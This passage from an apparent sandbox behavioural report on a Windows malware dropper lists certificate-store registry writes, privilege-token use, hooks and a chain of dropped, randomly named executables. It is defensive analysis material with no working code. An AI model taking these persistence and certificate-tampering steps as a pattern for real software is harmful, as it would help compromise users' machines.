0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (9).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (9).exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8683368.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cd-ab295-225-721bf-6247042dd1c93\Cyzhaesezhumy.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A71E.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3JGMC.tmp\builder.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (9).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (9).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv juDKImBLWkCHi9D6+osR0w.0.2
C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe
"C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe"
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe
"C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe
"C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe"
C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe
"C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe"
C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe
"C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe"
C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe
"C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe"
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
"C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe"
C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe
"C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe"
C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe
"C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe"
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe"
C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe
"C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\C413.bat C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Users\Admin\AppData\Local\Temp\is-LHKI0.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LHKI0.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp" /SL5="$60202,138429,56832,C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3124 -ip 3124
